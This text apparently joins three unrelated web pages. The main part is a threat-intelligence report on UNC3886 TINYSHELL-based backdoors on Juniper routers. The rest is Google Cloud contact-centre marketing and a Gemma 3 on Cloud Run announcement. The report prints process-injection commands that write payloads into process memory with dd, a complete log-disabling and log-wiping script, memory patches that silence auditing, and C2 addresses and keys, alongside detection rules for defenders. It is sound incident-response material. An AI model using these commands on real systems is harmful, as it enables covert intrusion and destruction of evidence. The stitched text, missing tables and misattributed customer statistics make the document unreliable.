Mandiant observed the threat actor inject malicious payloads into a newly spawned cat process. The actor created a named pipe called null using mkfifo and used cat to continuously read from it, effectively creating a hung process. This stage involved the following commands:

rm -rf null;
mkfifo null;
cat null &
set pid=$!
echo " $pid"

While the hung cat process was waiting for data from the null pipe, the threat actor leveraged dd to read binary data from the payload files and write it to specific memory locations inside the cat process.

dd if=loader.bin of=/proc/$pid/mem conv=notrunc obs=1 oseek=0x4012f0
dd if=pc.bin of=/proc/$pid/mem conv=notrunc obs=1 oseek=0x602820

The first dd command wrote the loader code from loader.bin at the virtual address 0x4012f0, which is the entrypoint of cat. The second dd command replaced data at 0x602820 with the content of pc.bin. Mandiant noted that 0x602820 is the global offset table entry for fclose, this memory location was overwritten with 0x4012f0, indicating that pc.bin contains the memory address where loader.bin was injected to.

The threat actor sent an empty string using echo to the null pipe. cat received an end-of-file signal after echo finished writing the data and attempted to close the file by executing fclose.

As the global offset table entry for fclose function was replaced with the entrypoint to the shellcode loader, cat executed the shellcode loader instead of the actual fclose function, and ultimately loaded the final payload from payload.bin in the same directory.

After payload.bin has been loaded, the threat actor removed the null file and the ldb directory, then terminated the current session. This left only the legitimate process running on the compromised router, now containing the malicious code. The following commands were used to achieve these actions:

sleep 1;echo -n>null;sleep 1;rm -rf null
cd ..
rm -rf ldb	
kill -9 $$

Mandiant’s investigation noted that this process injection is intended for executing the PIC version of the lmpad backdoor while veriexec is enabled and does not support execution of other backdoors identified on the file system of the compromised Juniper routers. 

Malware Overview

Mandiant’s investigation identified six distinct malware samples across multiple Juniper MX routers. Each sample is a modified version of a TINYSHELL backdoor, but with unique capabilities. All of these samples incorporate a core TINYSHELL backdoor functionality, but differ greatly when it comes to activation methods as well as additional, Junos OS specific features.

The following malware samples were identified:

1. appid – TINYSHELL based active backdoor, mimicking a legitimate binary named appidd (Application Identification Daemon)

2. to – TINYSHELL based active backdoor, mimicking a legitimate binary named top (Table of Processes)

3. irad – TINYSHELL based passive backdoor, mimicking a legitimate binary named irad (Interface Replication and Synchronization Daemon)

4. lmpad – TINYSHELL based utility and passive backdoor, mimicking a legitimate binary named lmpd (Link Management Protocol Daemon)

5. jdosd – TINYSHELL based passive backdoor, mimicking a legitimate binary named jddosd (Juniper DDOS protection Daemon)

6. oemd – TINYSHELL based passive backdoor, mimicking a legitimate binary named oamd (Operation, Administration and Maintenance Daemon)

TINYSHELL

TINYSHELL is a publicly available lightweight backdoor written in C that communicates using a custom binary protocol. The standard set of TINYSHELL commands comprises of:

• Remote file upload

• Remote file download

• Establishing remote shell session

A basic TINYSHELL implementation for FreeBSD seems to be a foundation for heavily customized backdoors detailed as follows.

Malware Analysis

appid — TINYSHELL-Based Active Backdoor

Sample one, named appid, is an active backdoor written in C. It is derived from the publicly available TINYSHELL source code with additional supported commands. It is an active backdoor that communicates to the following hardcoded command and control (C2) servers:

• TCP://129[.]126[.]109[.]50:22

• TCP://116[.]88[.]34[.]184:22

• TCP://223[.]25[.]78[.]136:22

• TCP://45[.]77[.]39[.]28:22

Mandiant believes these IPs are staging nodes of a GOBRAT ORB network, eventually leading to a single, backend Adversary Controlled Operations Server (“ACOS”).

This malware begins by communicating to a random C2 server from the list. The malware maintains two TCP sockets that will stay synchronized with the same C2 address. One socket is used for tasking requests and the other is for handling requests. The malware will rotate through the list of C2 servers until a successful connection is created and it will request a task using the first socket. After receiving a task from the C2, the malware then creates a second socket for handling this specific task. After the task is finished, the second socket is closed.

The malware encrypts all network traffic with AES using a hard-coded key. The following commands are supported by malware, consisting of standard TINYSHELL commands and added proxy and reconfiguration capabilities:

The following is the list of configuration items that can be changed by the command number 5 (tshd_config) and their associated config menu numbers:

to — TINYSHELL-Based Active Backdoor 

Sample two, named to, is the same as Sample 1 but with different hardcoded C2 servers:

• tcp://101[.]100[.]182[.]122:22

• tcp://118[.]189[.]188[.]122:22

• tcp://158[.]140[.]135[.]244:22

• tcp://8[.]222[.]225[.]8:22

irad — TINYSHELL-Based Passive Backdoor

Sample three, named irad, is a TINYSHELL based passive backdoor written in C. It acts as a libpcap-based packet sniffer and receives commands by inspecting packets on the wire looking for a magic-string that activates its backdoor capabilities. Malware supports 2 modes of operation: active mode, in which it will connect to a provided C2 address, or a passive – listening mode.  In addition to 3 standard TINYSHELL commands, it implements 2 custom commands and a custom activation routine.

The malware uses libpcap library to capture all network packets on the host (interface specified in the eth environment variable) matching the BPF filter of icmp[4:2] == 0xaa56. It reads 16 bytes of data starting at offset 10 from the ICMP packet. The malware has insufficient bounds checking and could read past the end of a packet payload if a smaller than expected packet is encountered.

For any ICMP type code 8 (Echo request) packets, it reads the 16 bytes of data and decrypts it with a single byte XOR key 0x86. It then compares the decrypted data with a magic string uSarguuS62bKRA0J. If the string matches and the byte 8 of the ICMP packet matches ascii character 1 or 2, it then reads the target IP and TCP port number from the ICMP packet and sends a beacon packet containing string WZtOTig2m42gXB6U to the specified IP (active mode). If the response from the target host begins with the string ek63a21km7WSWkfk then it exits, otherwise it decodes the command number from the packet:

If byte 8 of the ICMP packet is 0, the malware will spawn a listening server on TCP port 31234 (passive mode). The listening backdoor server supports the same set of 5 commands as listed in the previous table.

If the string 1spCq0BMbJwCoeZn is received, and the malware is currently operating as a listener and accepting connections on port 31234, then it will terminate the listening process.

lmpad — TINYSHELL-Based Utility and Passive Backdoor

Sample four, named lmpad is an utility and a passive backdoor written in C. In addition to standard TINYSHELL capabilities it can also launch an external script that can perform process injection into two legitimate Junos OS processes to inhibit logging. The main purpose of this malware is to disable all possible logging before the operator connects to the router to perform hands-on activities and then later restore the logs after the operator disconnects. 

The malware begins by attempting to receive a UDP packet on port 33615, where it receives an RC4 encrypted message and sends an acknowledgement message in response. The malware also checks the decrypted received payload against the following hex bytes, terminating the connection if it matches.

26 e7 2b 3a 1c a2 16 2d 61 89 57 a9 cd 4c e7 3c

The RC4 encryption key used to decrypt received UDP messages is: 0b3330c0b41d1ae2.

After the initial check, the malware enters a listening mode, waiting for commands. In addition to standard TINYSHELL commands (command 2, 4 and 5) it also implements 5 other custom commands:

Command 0

This command inhibits logging in preparation of hands-on threat actor activity on the router. It begins by writing a compressed zip archive to the file /var/tmp/pfed_jdhcp6_trace.log. It then executes the following command line to decompress the archive, execute an embedded script with argument pre and clean up the script after execution:

gzip -d /var/tmp/pfed_jdhcp6_trace.log -c > /var/tmp/pfed_jdhcp6_trace.log.bak; 
sh /var/tmp/pfed_jdhcp6_trace.log.bak pre ;
rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ;
kill -9 $$

The following is the uncompressed script file:

pre_ssh() {
#closelog
cp /mfs/var/etc/syslog.conf /mfs/var/etc/syslog.conf0
sed -i '' 's//dev/null #//g' /mfs/var/etc/syslog.conf0
sed -i '' 's/        /        /dev/null #/g' /mfs/var/etc/syslog.conf
ps -fcA |grep eventd | awk '{ print $1 }' | xargs kill -1
#last
cp -r /var/log/utx.log /var/log/utx.log0
cp -r /var/log/wtmp /var/log/wtmp0
}

post_ssh() {
#relog
cp /mfs/var/etc/syslog.conf0 /mfs/var/etc/syslog.conf
rm -f /mfs/var/etc/syslog.conf0
ps -fcA | grep eventd | awk '{ print $1 }' | xargs kill -1
#relast
cp -r /var/log/wtmp0 /var/log/wtmp
cp -r /var/log/utx.log /var/log/utx.log0
rm -f /var/log/wtmp0
}

backup() {
#backconf
rm -rf /var/rundb+
cp -r /var/rundb /var/rundb+
cp /var/db/commits /usr/lib/libjucomm.so.1
tar -cf /config/usage_db /config/juniper.conf.*
tar -cf /var/db/config/usage_db /var/db/config/juniper.conf.*
}

restore() {
#reconfig
cp -r /var/rundb+/* /var/rundb
cp /usr/lib/libjucomm.so.1 /var/db/commits
tar -xf /config/usage_db -C /
tar -xf /var/db/config/usage_db -C /
rm -r /var/rundb+
rm -f /usr/lib/libjucomm.so.1
rm -f /config/usage_db
rm -f /var/db/config/usage_db
}

if [ $1 = "pre" ]; then
pre_ssh
elif [ $1 = "post" ]; then
post_ssh
elif [ $1 = "backup" ]; then
backup
elif [ $1 = "restore" ]; then
restore
fi

echo done
exit 0

This script can execute 4 commands:

1. pre: backups syslog.conf as syslog.conf0, it also redirects all logging to /dev/null, sends HUP signal to eventd daemon responsible for logging and backs up last log and wtmp log. 

2. post: reverses changes done by pre_ssh, it restores original syslog.conf as well as last log and wtmp log, it removes backups and sends another HUP signal to eventd process. 

3. backup: it backups the current Juniper configuration database and commit logs and archives configuration files. 

4. restore: it restores previously backed up configuration database and config files and removes backups. 

After stopping logging with pre_ssh script, this command then reads the snmpd process PID from /var/run/snmpd.pid. It also reads 4 bytes of data from address 0x8601328 and writes it to the file /var/tmp/rts by using dd:

dd if=/proc/<pid>/mem of=/var/tmp/rts bs=1 count=4 iseek=0x8601328 2>/dev/null

It then changes this data to 0 and writes it to /var/tmp/rts and later back to snmpd process memory using the same dd technique:

dd of=/proc/<pid>/mem if=/var/tmp/rts bs=1 count=4 oseek=0x8601328 
conv=notrunc 2>/dev/null

This patches the snmpd process memory at address  0x8601328. The patch sets a global variable named trap_configs to 0. trap_configs possibly points to a structure containing SNMP traps that are sent to the monitoring server. Effectively this stops SNMP traps from being triggered which is most likely done to stop SNMP traps from triggering when specific events stop being logged in syslog. 

The malware then repeats similar actions against the mgd (Juniper Management Daemon) process. It reads mgd process PID from /var/run/mgd.pid and using the same technique previously mentioned it reads 4 bytes from  mgd process memory at 0x84E90D8 . It compares these bytes to 57E58955 (which after swapping endianness, disassembles to: PUSH RBP; MOV EBP,ESP; PUSH RDI instructions which is a typical function prologue), and if they match, it patches them with following bytes: C3D08990. If we disassemble these bytes from a little endian order, we get NOP; MOV EAX,EDX; RET instructions.

This patch modifies the prologue of the function at 0x84E90D8 to NOP, MOV EAX,EDX, RET  effectively skipping the rest of the function. Based on the behavioral analysis, the goal of this patch is likely to stop auditd logging of MGD login, logout, cmd events.

This direct memory manipulation using dd allows the attacker to alter program behavior and bypass security measures. UNC3886 previously used a similar tactic, where dd was used to disable file system verification on startup. In that case, UNC3886 exploited a vulnerability (CVE-2022-41328) to overwrite legitimate FortiOS system binaries, achieving persistence and evading security checks. 

Command 1

This command can reverse operations performed by Command 0 after the operator finished their hands-on-keyboard operations. It restores logging by executing sh /var/tmp/pfed_jdhcp6_trace.log.bak post, it also reverses patches to snmpd and mgd.

Command 2 — Launch CSH Session

This command launches an interactive /bin/csh session over the UDP connection, with a forked process encrypting the input and output of the shell and transmitting it over the network.

Before executing remote shell, this commands launches a series of sed commands to remove specific lines from log files:

sed -i '' '/root/d' /var/log/interactive-commands
sed -i '' -e '/vi/d' -e '/set/d' -e '/gdb/d' -e '/mgd/d' /root/.history
sed -i '' '/root/d' /var/log/messages
sed -i '' '/root/d' /var/log/auth

These remove lines containing the term root from /var/log/interactive-commands, /var/log/messages, and /var/log/auth. They also remove instances of vi, set, gdb, and mgd from /root/.history.

Command 3 — Request New Sleep Timeout

This command will cause the malware to send a reply to the connection containing the value of the current sleep timeout. The response to that message will contain the new 4-byte sleep timeout that will be used by the main command loop (in seconds).

Command 4 — File Upload

This command will cause the malware to send a specified file to the remote server.

Command 5 — File Download

This command will cause the malware to download a file from the remote server and write it to the disk.

Command 6 — Backup Configuration Database

This command causes the malware to execute the same script as Command 0 but with argument backup to backup Juniper configuration database and commit logs.

gzip -d /var/tmp/pfed_jdhcp6_trace.log -c > /var/tmp/pfed_jdhcp6_trace.log.bak; 
sh /var/tmp/pfed_jdhcp6_trace.log.bak backup ;
rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ;
kill -9 $$

Command 7 — Restore configuration database

This command causes the malware to execute the same script as Command 0 but with argument restore to restore Juniper configuration database and commit logs:

gzip -d /var/tmp/pfed_jdhcp6_trace.log -c > /var/tmp/pfed_jdhcp6_trace.log.bak; 
sh /var/tmp/pfed_jdhcp6_trace.log.bak restore ;
rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ;
kill -9 $$

Command 8 – Receive new socket timeout value

This command will cause the malware to send a reply to the connection containing the value of the current socket timeout. The response to that message will contain the new 4-byte value that will be used to update the main socket timeout. The default socket timeout value is 300 seconds

If any other command is passed, malware will close the socket and exit. 

jdosd — TINYSHELL-Based Passive Backdoor

Sample five, named jdosd, is a passive backdoor written in C. It implements a UDP backdoor operating on a fixed port number which provides file transfer and remote shell capabilities.

Malware binds to UDP port 33512 and uses a custom RC4 implementation. This implementation has a bug in it where it doesn’t properly retrieve a final state box value during its PRGA generation. The following key is used for the traffic encryption:

4fd37426-65dd-4a8d-8ba6-1382a011dae9

The attacker initiates the connection to the backdoor by sending a magic value 0xDEADBEEF. The malware responds to this message by sending the same message in response, encrypted with custom RC4. The malware will then send the process ID (pid) of its own process to the C2.

After the initial beacon the malware waits for additional commands. In addition to standard TINYSHELL commands (1-3), there are two additional commands supported(0xAC, 0xFF):

oemd — TINYSHELL-Based Passive Backdoor

Sample six, named oemd, is a passive backdoor written in C. The backdoor receives the C2 address and port by binding on specific network interfaces. Network interfaces are stored in an environment variable. The backdoor communicates with the C2 over TCP. Communication with C2 is AES-encrypted and XOR-encoded.

The malware configuration is stored in the following environment variables:

• INTFS: The network interfaces’ names to bind to.

• RTS: The routing addresses to bind to (instead of interfaces).

• UPRT: The port to bind to (if not specified, 45678 is used)

• DAEMON: Run the sample in the background.

During initialization, malware executes following command to retrieve local-index number of an interface specified in the INTFS environment variable:

ifinfo '<interface>' | grep local-index | grep -Eo '[0-9]+'

After setting up a local UDP socket, malware binds to 0.0.0.0:<port> on the specified interfaces and waits for the attacker to send the C2 address and port. Although the bind socket is a UDP socket, the sample communicates with the C2 using TCP.

Malware supports a set of standard TINYSHELL commands:

• 1: Upload a file.

• 2: Download a file.

• 3: Execute a shell command.

When executing shell commands, the malware clears the HISTFILE environment variable and allows the attacker to specify the TERM value.

Junos OS Specific Socket Options

All the previously listed samples create an AF_ROUTE socket using socket(AF_ROUTE(17), SOCK_SEQPACKET(5), 0). Running these samples on a standard FreeBSD system would return an invalid socket, hence we believe this to be a JunosOS specific implementation.

We believe that this socket is used to establish a connection for communicating with the operating system’s routing subsystem. The AF_ROUTE constant designates the socket family for routing operations, and SOCK_SEQPACKET specifies a reliable, message-oriented connection. This socket is used to read and write a packet similar in structure to rt_* messages on OpenBSD to retrieve the interface index. From all the samples, only oemd uses the ifinfo command to retrieve the interface index, while other samples are using a custom rt_* messages via the socket.

The custom message contains an interface name and a logical sub interface. On Juniper routing devices, instead of tagging packets with VLAN IDs, sub-interfaces act as distinct interfaces with their own IP addresses, routing configurations, and potentially different security policies. The interface index value is then passed into a setsockopt call for a command and control socket either TCP or UDP.

Activity in Linux Environments

Mandiant continued to observe UNC3886 leverage similar TTPs and use of the same malware and utilities as detailed in our previous blog post as follows:

• Command execution and persistence using a combination of rootkits and utilities, including REPTILE and MEDUSA with SEAELF loader, and BUSYBOX.

• Instead of using the publicly available kubo/injector as noted previously, Mandiant observed UNC3886 deployed PITHOOK along with a custom SSH server based on the publicly available wzshiming/sshd project to hijack SSH authentications and capture SSH credentials.

• TACACS+ daemon binary was replaced by a backdoored version of the binary with similar malicious functions for capturing credentials.

• Use of GHOSTTOWN malware for anti-forensics purposes.

Mandiant’s investigation did not observe evidence of data staging and exfiltration.

Outlook and Implications

This blog post further highlights China-nexus espionage actors  are continuing to compromise networking infrastructure with custom malware ecosystems. While UNC3886 previously focused their operations on network edge devices, this activity demonstrated they’re also targeting internal networking infrastructure, such as Internet Service Provider (ISP) routers.

Mandiant observed the threat actor targeting network authentication services, including the Terminal Access Controller Access-Control System (TACACS+), and terminal servers with access to the routers to gain privileged initial access.

This privileged access allowed the threat actor to enter Junos OS shell mode and perform restricted operations. Investigating further actions taken by the threat actor was hampered by the challenges inherent in analyzing proprietary network devices, which required novel methods for artifact acquisition and analysis. 

Mandiant recommends organizations:

• Upgrade Juniper devices and run security checks: Organizations should upgrade their Juniper devices to the latest images which contain mitigations and updated signatures for JMRT and run JMRT Quick Scan and Integrity check after the upgrade. 
• Secure Authentication: Implement a centralized Identity and Access Management (IAM) system with robust multi-factor authentication (MFA) and granular role-based access control (RBAC) for managing network devices.
• Configuration Management: Implement a network configuration management that supports configuration validation against defined templates and standards, with the ability to automatically remediate deviations or trigger alerts for manual intervention.
• Enhanced Monitoring: Address and prioritize high-risk administrative activities and implement monitoring solutions with a process to regularly review the effectiveness of detection.
• Vulnerability Management: Prioritize patching and mitigation of vulnerabilities in network devices, including those in lesser-known operating systems.
• Device Lifecycle Management: Implement a device lifecycle management program that includes proactive monitoring, automated software updates, and end-of-life (EOL) replacement planning to ensure network devices are always supported and secure. 
• Security Hardening: Strengthen the security posture of network devices, administrative devices and systems used for managing network devices by implementing strict access controls, network segmentation, and other security measures.
• Threat Intelligence: Proactively leverage threat intelligence to continually evaluate and improve the effectiveness of security controls against emerging threats.

The compromise of routing devices is a recent trend in the tactics of espionage-motivated adversaries as it grants the capability for a long-term, high-level access to the crucial routing infrastructure, with a potential for more disruptive actions in the future. A concerted effort is required to safeguard these critical systems and ensure the continued stability and security of the internet.

Organizations potentially impacted by this campaign are strongly advised to engage Mandiant’s Custom Threat Hunt service. Mandiant’s team of security experts can proactively identify and mitigate hidden threats, providing clarity and confidence in your security posture.

Indicators of Compromise

A Google Threat Intelligence Collection of IOCs is available for registered users. For Google Security Operations Enterprise+ customers, rules have been released to your Emerging Threats rule pack, and indicators of compromise (IOCs) listed in this blog post are available for prioritization with Applied Threat Intelligence.

Host-Based Indicators

Network Indicators

Detection

YARA-L Rules

Relevant rules are available in the Google SecOps Mandiant Intel Emerging Threats curated detections rule set.

• SEAELF Installer Execution

• GHOSTTOWN Utility Execution

• REPTILE Rootkit Command Line Argument Tampering

• REPTILE Rootkit Cmd Component Usage

• REPTILE Rootkit Shell Component Usage

• REPTILE Rootkit Hide Command Usage

YARA Rules

rule M_Hunting_PacketEncryptionLayer_1
{
    meta:
        author = "Mandiant"
    strings:
        $pel_1 = "pel_client_init"
        $pel_2 = "pel_server_init"
        $pel_3 = "pel_setup_context"
        $pel_4 = "pel_send_msg"
        $pel_5 = "pel_recv_msg"
        $pel_6 = "pel_send_all"
        $pel_7 = "pel_recv_all"
        $pel_8 = "pel_errno"
        $pel_9 = "pel_context"
        $pel_10 = "pel_ctx"
        $pel_11 = "send_ctx"
        $pel_12 = "recv_ctx"
    condition:
        4 of ($pel_*)
}

rule M_Hunting_TINYSHELL_5
{
    meta:
        author = "Mandiant"
    strings:
        $tsh_1 = "tsh_get_file"
        $tsh_2 = "tsh_put_file"
        $tsh_3 = "tsh_runshell"
        $tshd_1 = "tshd_get_file"
        $tshd_2 = "tshd_put_file"
        $tshd_3 = "tshd_runshell"
    condition:
        all of ($tshd_*) or all of ($tsh_*)
}

Snort/Suricata Rules

alert udp any any -> any any ( msg:"M_Backdoor_TINYSHELL_deadbeef_1"; 
dsize:>15; content:"|44 31 3A 14 45 95 6A 73|"; offset: 0; depth:8; 
threshold:type limit,track by_src,count 1,seconds 3600; sid:1000000; rev:1; )

alert udp any any -> any any ( msg:"M_Backdoor_TINYSHELL_deadbeef_2"; 
dsize:>15; content:"|64 11 1A 34 65 B5 4A 53|"; offset: 0; depth:8; 
threshold:type limit,track by_src,count 1,seconds 3600; sid:1000001; rev:1; )

alert icmp any any -> any any ( msg:"M_Backdoor_TINYSHELL_uSarguuS62bKRA0J"; 
content:"|f3 d5 e7 f4 e1 f3 f3 d5 b0 b4 e4 cd d4 c7 b6 cc|"; threshold:type 
limit,track by_src,count 1,seconds 3600; sid:1000002; rev:1; )

alert udp any any -> any any ( msg:"M_Backdoor_TINYSHELL_0b3330c0b41d1ae2"; 
dsize:>27; content:"|c5 c4 ec 4d|"; offset: 0; depth:4; content:"|a6 04 ed 83 
92 46 ce 40 9a 34 8c 7b 5a d6 e5 0d|"; offset:12; depth:16; threshold:type 
limit,track by_src,count 1,seconds 3600; sid:1000003; rev:1; )

The demands for top-notch customer service have never been greater — but so are the rewards for those companies that can deliver on the promise. Indeed, organizations with higher customer loyalty scores have delivered 3.5 times more cumulative shareholder return over 10 years, according to Bain & Company. 

While technology has largely fueled these rising customer expectations, it’s also delivering the tools to meet the moment. Notably, generative AI provides unprecedented capabilities that have enabled organizations of all sizes and across all industries to transform their contact center operations.

Whether it’s how customers interact with brands or supporting team functions behind the scenes, AI is significantly enhancing customer experiences and resulting in higher customer loyalty scores. Many leading organizations are realizing these gains through the implementation of Google Cloud’s Customer Engagement Suite with Google AI.

Since its introduction last September, Customer Engagement Suite has helped companies deliver greatly improved customer service and business impact. They have boosted self-service with Conversational Agents, empowered customer service representatives with Agent Assist, and modernized contact center operations with Conversational Insights, Quality AI, and Google Cloud Contact Center-as-a-Service (CCaaS). 

To help existing users and new ones achieve even more, we’re excited to announce the latest advancements and features coming to the Customer Engagement Suite. 

These new capabilities make building AI agents easier, help customer service representatives be more productive, and streamline contact center operations. Read on to discover how leading businesses worldwide are already transforming the way they connect with their customers using Customer Engagement Suite — as well as what the platform can do for you.

Companies are seeing strong business results

From boosting customer satisfaction to streamlining operations and reducing costs, Google’s Customer Engagement Suite is helping companies deliver significant business impact. 

• TTEC is a leading provider of business-process outsourcing (BPO) for customer experience (CX)  operations. They support 15 BPO clients, as well as TTEC’s own internal contact center operations. More than 1,400 of their customer care representatives use the Customer Engagement Suite to support use cases such as HR and IT help desks, customer care, and sales. 

• With Conversational Agents, TTEC has been able to automate up to 40% of customer interactions across payroll, a benefits help desk, HR, new hire onboarding, equipment returns, emergency hotlines, and employee call out use cases. 

• Agent Assist has led to a 40% reduction in escalations and Knowledge Assist capabilities have led to a 11% reduction in the average handle time, with new hires seeing 18% improvement. 

• Call Summarization has led to a 30 second reduction in average handle time and after-call work time (the latter is the time agents spend completing tasks after an interaction). One client reported seeing a 4 minute reduction in after-call work time. 

• Data analytics from Conversational Insights helped reduce manual quality assurance processes, and a further 10% to 20% reduction in average handle times from analytics-led process improvements. 

• You can learn more about TTEC’s AI-driven transformation in the Smarter CX, Bigger Impact: Transforming Customer Experience with Google AI webinar. 

• 55% of their customers get an answer to their question in less than a minute by engaging with Sandy, their self-service AI agent built using Conversational Agents. 

• The multi-language capabilities of Google’s Customer Engagement Suite enabled them to scale operations to new markets in Europe using their existing workforce, resulting in operational savings of £3 million ($3.8 million) per year. 

• You can learn more about their AI-enabled transformation at New Way Now: loveholidays powers smoother travel experiences with Google Cloud AI.

• With Conversational Agents, YouTube was able to improve information gathering experiences over voice and SMS channels. Combining this with Agent Assist, they achieved a 23% reduction in average handle time.

• Through scaling their people, processes, and leveraging Google’s Customer Engagement Suite, YouTube dramatically improved the customer experience, reducing abandons in queue by 75%.

Announcing new AI-enabled capabilities 

Today, we are happy to introduce our latest Customer Engagement Suite innovations that will enable users to build hybrid conversational agents at scale, enhance employee coaching and training, and improve contact center operations.

• New Conversational Agents capabilities
  • Natural sounding HD voices: Our latest voice models provide human-sounding emotions and intonations, with steerable voice instructions and configurable pauses, pronunciation, and emotion to provide life-like conversational experiences. There are now 30 new voices with various tones to choose from. We can’t wait for you to hear them.
  • Unified console to build hybrid agents is now generally available: By combining generative AI and rules-based controls, the new Conversational Agents console enables users to rapidly build AI agents for self-service experiences, with realistic, natural-sounding inflection and expressive conversations that are grounded in both business and customer logic. The console provides users with new evaluation capabilities to benchmark agent performance, understand single turn and multi-turn conversational metrics, and build feedback loops to help create and manage their AI agents. 
    To improve reliability and quality at the scale large enterprises need, we also introduced observability, evaluation, and test-case instrumentation into the Conversational Agents console. This enables customers and partners to validate agent quality at scale, with tools to consistently monitor and improve their self-service experiences. 
  • Prebuilt agents: These quick start reference agents allow users to get started easily with consumer commerce. We are initially launching four prebuilt agents: flight booking, movie ticketing, shopping assistance, and appointment booking. They demonstrate various capabilities including: geolocation API use; connecting to Google products like BigQuery for data retrieval; Google Calendar for appointment booking; and rich text formatting to build beautiful interfaces for end users.
  • Out-of-the-box connectors: We are making it easy to expand AI agent capabilities by introducing more than 30 data retrieval connectors to augment the knowledge of your agent, and 70-plus action connectors to allow your agent to take actions with or without human-in-the-loop for approvals. Connectors include common data sources like BigQuery, Salesforce, SharePoint, Jira, ServiceNow and more. With the new Conversational Agents connectors, customers get out-of-the-box, click-to-deploy tools that speed up time to production, provide seamless customer personalization, and quickly help realize the business impact of Conversational AI.
• New Agent Assist and Conversational Insights capabilities
  • AI Coach: This Gemini-powered feature is designed to improve employee productivity with real-time and contextual coaching and guidance to speed up time to resolution and improve customer satisfaction. It provides contextual step-by-step agent coaching to guide customer service representatives through complex interactions, upsell opportunities, compliance steps, automated information retrieval, and follow up steps. Customer service representatives always have a partner at the ready! This feature is available in public preview.
  • AI Trainer: This feature provides AI-powered simulation, personalized training, and real-time coaching to address service challenges, information overload, and difficulty handling feedback. This allows new hires and less experienced support staff to learn in a safe, controlled environment to avoid inadvertently delivering lower quality responses and risking negative impact on an organization’s brand, while providing self-service tools for them to continually improve on quality. Agent Trainer boosts business performance and customer satisfaction, delivering ROI through lower training costs, tailored training recommendations, faster agent proficiency, and better customer satisfaction and average handle time scores, ultimately reducing turnover. This feature is available in public preview.
• New Contact Center-as-a-Service (CCaaS) capabilities
  • New web and voice co-browse: This feature helps customer service representatives see what customers see, so they can provide more effective service, lower abandonment rates, and help improve both customer satisfaction and loyalty. Co-browse delivers an improved digital experience with real-time, collaborative browsing that allows support representatives to deliver seamless digital customer experiences, and improve first contact resolution and customer satisfaction.
  • Customizable dashboarding and reporting: Enhance access to information and help supervisors and managers better measure and manage their operations. Enhanced reporting, powered by Looker that’s embedded in the product, provides new customizable dashboarding and reporting tools to improve access to information and help supervisors and managers better measure and manage their operations.
  • Standalone agent desktop application: The new standalone agent desktop client provides an out-of-the-box, omnichannel, and multimodal interface. By seamlessly integrating with Agent Assist capabilities, like generative knowledge assist and post-interaction summarization, it helps improve agent efficiency and productivity. It provides a flexible, customizable layout, new UI modules that integrate with third-party data sources, and easily integrate with a system of record like a customer relationship management (CRM) system.

The Future is Now

Generative AI’s latest developments are clearly accelerating customer experience and contact center transformation throughout the customer journey. Great customer experience improves customer engagement, retention, and brand loyalty, and it can boost sales by lowering drop-offs and cart abandonment in online commerce. 

Conversational AI and automation are crucial for improving customer experience and operational efficiency because the solution involves many touchpoints, systems, and channels. Google Cloud is helping lead this transformation by providing AI-powered use cases and applications at scale.

Take the next step

• Schedule a free consultation with Google’s AI specialists to identify specific use cases and applications that will help your organization deliver similar business impact results.

• Come meet with us at Enterprise Connect (March 17-20) in Orlando. See these products in action in our booth and speak with our AI and customer experience experts and partners. Be sure to check out the Google keynote, “5 Ways AI Will Transform Customer Experience and Collaboration”, along with six panel sessions Google is speaking on at the event.

Today, we introduced Gemma 3, a family of lightweight, open models built with the cutting-edge technology behind Gemini 2.0. The Gemma 3 family of models have been designed for speed and portability, empowering developers to build sophisticated AI applications at scale. Combined with Cloud Run, it has never been easier to deploy your serverless workloads with AI models.

In this post, we’ll explore the functionalities of Gemma 3, and how you can run it on Cloud Run. 

Gemma 3: Power and efficiency for Cloud deployments

Gemma 3 is engineered for exceptional performance with lower memory footprints, making it ideal for cost-effective inference workloads. 

• Built with the world’s best single-accelerator model: Gemma 3 delivers optimal performance for its size, outperforming Llama-405B, DeepSeek-V3 and o3-mini in preliminary human preference evaluations on LMArena’s leaderboard. This helps you to create engaging user experiences that can fit on a single GPU or TPU.

• Create AI with advanced text and visual reasoning capabilities: Easily build applications that analyze images, text and short videos, opening up possibilities for interactive applications.

• Handle complex tasks with a large context window: Gemma 3 offers a 128k-token context window to let your applications process and understand vast amounts of information — even entire novels — enabling more sophisticated AI capabilities..

Serverless inference with Gemma 3 and Cloud Run

Gemma 3 is a great fit for inference workloads on Cloud Run using Nvidia L4 GPUs. Cloud Run is Google Cloud’s fully managed serverless platform, helping developers leverage container runtimes without having to concern themselves with the underlying infrastructure. Models scale to zero when inactive, and scale dynamically with demand. Not only does this optimize costs and performance, but you only pay for what you use. 

For example, you could host an LLM on one Cloud Run service and a chat agent on another, enabling independent scaling and management. And with GPU acceleration, a Cloud Run service can be ready with the first AI inference results in under 30 seconds, with only 5 seconds to start an instance. This rapid deployment ensures that your applications deliver responsive user experiences. We also reduced the GPU price in Cloud Run down to ~$0.6/hr. And of course, if your service isn’t receiving requests, it will scale down to zero.

Get started today

Cloud Run and Gemma 3 combine to create a powerful, cost-effective, and scalable solution for deploying advanced AI applications. Gemma 3 is supported by a variety of tools and frameworks, such as Hugging Face Transformers, Ollama, and vLLM.

To get started, visit this guide which will show you how to build a service with Gemma 3 on Cloud Run with Ollama.